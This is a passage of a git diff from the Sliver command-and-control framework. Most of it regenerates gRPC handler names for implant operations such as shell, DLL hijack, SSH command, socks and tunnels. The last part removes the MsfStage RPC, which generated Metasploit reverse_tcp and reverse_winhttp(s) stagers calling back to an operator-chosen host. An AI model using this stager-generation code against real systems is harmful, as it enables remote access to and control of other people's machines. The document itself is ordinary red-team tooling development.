return srv.(SliverRPCServer).RegistryRead(ctx, req.(*sliverpb.RegistryReadReq))
@@ -5660,7 +5443,7 @@ func _SliverRPC_RegistryWrite_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RegistryWrite_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RegistryWrite",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RegistryWrite(ctx, req.(*sliverpb.RegistryWriteReq))
@@ -5678,7 +5461,7 @@ func _SliverRPC_RegistryCreateKey_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RegistryCreateKey_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RegistryCreateKey",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RegistryCreateKey(ctx, req.(*sliverpb.RegistryCreateKeyReq))
@@ -5696,7 +5479,7 @@ func _SliverRPC_RegistryDeleteKey_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RegistryDeleteKey_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RegistryDeleteKey",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RegistryDeleteKey(ctx, req.(*sliverpb.RegistryDeleteKeyReq))
@@ -5714,7 +5497,7 @@ func _SliverRPC_RegistryListSubKeys_Handler(srv interface{}, ctx context.Context
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RegistryListSubKeys_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RegistryListSubKeys",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RegistryListSubKeys(ctx, req.(*sliverpb.RegistrySubKeyListReq))
@@ -5732,7 +5515,7 @@ func _SliverRPC_RegistryListValues_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RegistryListValues_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RegistryListValues",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RegistryListValues(ctx, req.(*sliverpb.RegistryListValuesReq))
@@ -5750,7 +5533,7 @@ func _SliverRPC_RegistryReadHive_Handler(srv interface{}, ctx context.Context, d
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RegistryReadHive_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RegistryReadHive",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RegistryReadHive(ctx, req.(*sliverpb.RegistryReadHiveReq))
@@ -5768,7 +5551,7 @@ func _SliverRPC_RunSSHCommand_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RunSSHCommand_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RunSSHCommand",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RunSSHCommand(ctx, req.(*sliverpb.SSHCommandReq))
@@ -5786,7 +5569,7 @@ func _SliverRPC_HijackDLL_Handler(srv interface{}, ctx context.Context, dec func
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_HijackDLL_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/HijackDLL",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).HijackDLL(ctx, req.(*clientpb.DllHijackReq))
@@ -5804,7 +5587,7 @@ func _SliverRPC_GetPrivs_Handler(srv interface{}, ctx context.Context, dec func(
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetPrivs_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetPrivs",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetPrivs(ctx, req.(*sliverpb.GetPrivsReq))
@@ -5822,7 +5605,7 @@ func _SliverRPC_StartRportFwdListener_Handler(srv interface{}, ctx context.Conte
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StartRportFwdListener_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StartRportFwdListener",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StartRportFwdListener(ctx, req.(*sliverpb.RportFwdStartListenerReq))
@@ -5840,7 +5623,7 @@ func _SliverRPC_GetRportFwdListeners_Handler(srv interface{}, ctx context.Contex
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetRportFwdListeners_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetRportFwdListeners",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetRportFwdListeners(ctx, req.(*sliverpb.RportFwdListenersReq))
@@ -5858,7 +5641,7 @@ func _SliverRPC_StopRportFwdListener_Handler(srv interface{}, ctx context.Contex
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_StopRportFwdListener_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/StopRportFwdListener",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).StopRportFwdListener(ctx, req.(*sliverpb.RportFwdStopListenerReq))
@@ -5876,7 +5659,7 @@ func _SliverRPC_OpenSession_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_OpenSession_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/OpenSession",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).OpenSession(ctx, req.(*sliverpb.OpenSession))
@@ -5894,7 +5677,7 @@ func _SliverRPC_CloseSession_Handler(srv interface{}, ctx context.Context, dec f
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CloseSession_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CloseSession",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CloseSession(ctx, req.(*sliverpb.CloseSession))
@@ -5912,7 +5695,7 @@ func _SliverRPC_RegisterExtension_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RegisterExtension_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RegisterExtension",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RegisterExtension(ctx, req.(*sliverpb.RegisterExtensionReq))
@@ -5930,7 +5713,7 @@ func _SliverRPC_CallExtension_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CallExtension_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CallExtension",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CallExtension(ctx, req.(*sliverpb.CallExtensionReq))
@@ -5948,7 +5731,7 @@ func _SliverRPC_ListExtensions_Handler(srv interface{}, ctx context.Context, dec
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ListExtensions_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ListExtensions",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ListExtensions(ctx, req.(*sliverpb.ListExtensionsReq))
@@ -5966,7 +5749,7 @@ func _SliverRPC_RegisterWasmExtension_Handler(srv interface{}, ctx context.Conte
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_RegisterWasmExtension_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/RegisterWasmExtension",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).RegisterWasmExtension(ctx, req.(*sliverpb.RegisterWasmExtensionReq))
@@ -5984,7 +5767,7 @@ func _SliverRPC_ListWasmExtensions_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ListWasmExtensions_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ListWasmExtensions",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ListWasmExtensions(ctx, req.(*sliverpb.ListWasmExtensionsReq))
@@ -6002,7 +5785,7 @@ func _SliverRPC_ExecWasmExtension_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_ExecWasmExtension_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/ExecWasmExtension",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).ExecWasmExtension(ctx, req.(*sliverpb.ExecWasmExtensionReq))
@@ -6020,7 +5803,7 @@ func _SliverRPC_WGStartPortForward_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_WGStartPortForward_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/WGStartPortForward",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).WGStartPortForward(ctx, req.(*sliverpb.WGPortForwardStartReq))
@@ -6038,7 +5821,7 @@ func _SliverRPC_WGStopPortForward_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_WGStopPortForward_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/WGStopPortForward",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).WGStopPortForward(ctx, req.(*sliverpb.WGPortForwardStopReq))
@@ -6056,7 +5839,7 @@ func _SliverRPC_WGStartSocks_Handler(srv interface{}, ctx context.Context, dec f
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_WGStartSocks_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/WGStartSocks",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).WGStartSocks(ctx, req.(*sliverpb.WGSocksStartReq))
@@ -6074,7 +5857,7 @@ func _SliverRPC_WGStopSocks_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_WGStopSocks_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/WGStopSocks",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).WGStopSocks(ctx, req.(*sliverpb.WGSocksStopReq))
@@ -6092,7 +5875,7 @@ func _SliverRPC_WGListForwarders_Handler(srv interface{}, ctx context.Context, d
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_WGListForwarders_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/WGListForwarders",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).WGListForwarders(ctx, req.(*sliverpb.WGTCPForwardersReq))
@@ -6110,7 +5893,7 @@ func _SliverRPC_WGListSocksServers_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_WGListSocksServers_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/WGListSocksServers",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).WGListSocksServers(ctx, req.(*sliverpb.WGSocksServersReq))
@@ -6128,7 +5911,7 @@ func _SliverRPC_Shell_Handler(srv interface{}, ctx context.Context, dec func(int
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Shell_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Shell",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Shell(ctx, req.(*sliverpb.ShellReq))
@@ -6146,7 +5929,7 @@ func _SliverRPC_Portfwd_Handler(srv interface{}, ctx context.Context, dec func(i
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Portfwd_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Portfwd",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Portfwd(ctx, req.(*sliverpb.PortfwdReq))
@@ -6164,7 +5947,7 @@ func _SliverRPC_CreateSocks_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CreateSocks_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CreateSocks",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CreateSocks(ctx, req.(*sliverpb.Socks))
@@ -6182,7 +5965,7 @@ func _SliverRPC_CloseSocks_Handler(srv interface{}, ctx context.Context, dec fun
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CloseSocks_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CloseSocks",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CloseSocks(ctx, req.(*sliverpb.Socks))
@@ -6226,7 +6009,7 @@ func _SliverRPC_CreateTunnel_Handler(srv interface{}, ctx context.Context, dec f
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CreateTunnel_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CreateTunnel",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CreateTunnel(ctx, req.(*sliverpb.Tunnel))
@@ -6244,7 +6027,7 @@ func _SliverRPC_CloseTunnel_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_CloseTunnel_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/CloseTunnel",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).CloseTunnel(ctx, req.(*sliverpb.Tunnel))
@@ -6610,10 +6393,6 @@ var SliverRPC_ServiceDesc = grpc.ServiceDesc{
MethodName: "SaveImplantProfile",
Handler: _SliverRPC_SaveImplantProfile_Handler,
},
- {
- MethodName: "MsfStage",
- Handler: _SliverRPC_MsfStage_Handler,
- },
{
MethodName: "ShellcodeRDI",
Handler: _SliverRPC_ShellcodeRDI_Handler,
diff --git a/protobuf/sliverpb/sliver.pb.go b/protobuf/sliverpb/sliver.pb.go
index cbc6d8c671..ea25883270 100644
--- a/protobuf/sliverpb/sliver.pb.go
+++ b/protobuf/sliverpb/sliver.pb.go
@@ -1,7 +1,7 @@
// Code generated by protoc-gen-go. DO NOT EDIT.
// versions:
-// protoc-gen-go v1.34.1
-// protoc v5.26.1
+// protoc-gen-go v1.28.1
+// protoc v4.25.3
// source: sliverpb/sliver.proto
package sliverpb
diff --git a/server/msf/msf.go b/server/msf/msf.go
index bab54acee1..0882cbcc16 100644
--- a/server/msf/msf.go
+++ b/server/msf/msf.go
@@ -21,7 +21,6 @@ package msf
import (
"bytes"
"fmt"
- "net/url"
"os/exec"
"strconv"
"strings"
@@ -116,7 +115,6 @@ type VenomConfig struct {
BadChars []string
Format string
Luri string
- AdvOptions string
}
// Version - Return the version of MSFVenom
@@ -164,20 +162,6 @@ func VenomPayload(config VenomConfig) ([]byte, error) {
luri = fmt.Sprintf("LURI=%s", luri)
}
- // Parse advanced options
- advancedOptions := make(map[string]string)
- if config.AdvOptions != "" {
- options, err := url.ParseQuery(config.AdvOptions)
- if err != nil {
- return nil, fmt.Errorf("could not parse provided advanced options: %s", err.Error())
- }
- for option, value := range options {
- // Options should only be specified once,
- // so if a given option is specified more than once, use the last value
- advancedOptions[option] = value[len(value)-1]
- }
- }
-
args := []string{
"--platform", config.Os,
"--arch", config.Arch,
@@ -188,10 +172,6 @@ func VenomPayload(config VenomConfig) ([]byte, error) {
"EXITFUNC=thread",
}
- for optionName, optionValue := range advancedOptions {
- args = append(args, fmt.Sprintf("%s=%s", optionName, optionValue))
- }
-
if luri != "" {
args = append(args, luri)
}
diff --git a/server/rpc/rpc-msf.go b/server/rpc/rpc-msf.go
index 5e55af1691..92e42e4d7e 100644
--- a/server/rpc/rpc-msf.go
+++ b/server/rpc/rpc-msf.go
@@ -20,16 +20,10 @@ package rpc
import (
"context"
- "errors"
- "fmt"
- "math/rand"
- "path"
- "time"
"github.com/bishopfox/sliver/protobuf/clientpb"
"github.com/bishopfox/sliver/protobuf/commonpb"
"github.com/bishopfox/sliver/protobuf/sliverpb"
- "github.com/bishopfox/sliver/server/codenames"
"github.com/bishopfox/sliver/server/core"
"github.com/bishopfox/sliver/server/db"
"github.com/bishopfox/sliver/server/log"
@@ -143,102 +137,3 @@ func (rpc *Server) MsfRemote(ctx context.Context, req *clientpb.MSFRemoteReq) (*
}
return resp, nil
}
-
-// MsfStage - Generate a MSF compatible stage
-func (rpc *Server) MsfStage(ctx context.Context, req *clientpb.MsfStagerReq) (*clientpb.MsfStager, error) {
- var (
- MSFStage = &clientpb.MsfStager{
- File: &commonpb.File{},
- }
- payload string
- arch string
- uri string
- )
-
- switch req.GetArch() {
- case "amd64":
- arch = "x64"
- default:
- arch = "x86"
- }
-
- switch req.Protocol {
- case clientpb.StageProtocol_TCP:
- payload = "meterpreter/reverse_tcp"
- case clientpb.StageProtocol_HTTP:
- payload = "custom/reverse_winhttp"
- uri = generateCallbackURI(req.HTTPC2ConfigName)
- case clientpb.StageProtocol_HTTPS:
- payload = "custom/reverse_winhttps"
- uri = generateCallbackURI(req.HTTPC2ConfigName)
- default:
- return MSFStage, errors.New("protocol not supported")
- }
-
- // We only support windows at the moment
- if req.GetOS() != "windows" {
- return MSFStage, fmt.Errorf("%s is currently not supported", req.GetOS())
- }
-
- venomConfig := msf.VenomConfig{
- Os: req.GetOS(),
- Payload: payload,
- LHost: req.GetHost(),
- LPort: uint16(req.GetPort()),
- Arch: arch,
- Format: req.GetFormat(),
- BadChars: req.GetBadChars(), // TODO: make this configurable
- Luri: uri,
- AdvOptions: req.AdvOptions,
- }
-
- stage, err := msf.VenomPayload(venomConfig)
- if err != nil {
- rpcLog.Warnf("Error while generating msf payload: %v\n", err)
- return MSFStage, err
- }
- MSFStage.File.Data = stage
- name, err := codenames.GetCodename()
- if err != nil {
- return MSFStage, err
- }
- MSFStage.File.Name = name
- return MSFStage, nil
-}
-
-// Utility functions
-func generateCallbackURI(httpC2ConfigName string) string {
- httpC2Config, err := db.LoadHTTPC2ConfigByName(httpC2ConfigName)
- if err != nil {
- return ""
- }
- segments := httpC2Config.ImplantConfig.PathSegments
- StageFiles := []string{}
- StagePaths := []string{}
-
- for _, segment := range segments {
- if segment.SegmentType == 3 {
- if segment.IsFile {
- StageFiles = append(StageFiles, segment.Value)
- } else {
- StagePaths = append(StagePaths, segment.Value)
- }
- }
- }
-
- return path.Join(randomPath(StagePaths, StageFiles)...)
-}
-
-func randomPath(segments []string, filenames []string) []string {
- seed := rand.NewSource(time.Now().UnixNano())
- insecureRand := rand.New(seed)
- n := insecureRand.Intn(3) // How many segments?
- genSegments := []string{}
- for index := 0; index < n; index++ {
- seg := segments[insecureRand.Intn(len(segments))]
- genSegments = append(genSegments, seg)
- }
- filename := filenames[insecureRand.Intn(len(filenames))]
- genSegments = append(genSegments, filename)
- return genSegments
-}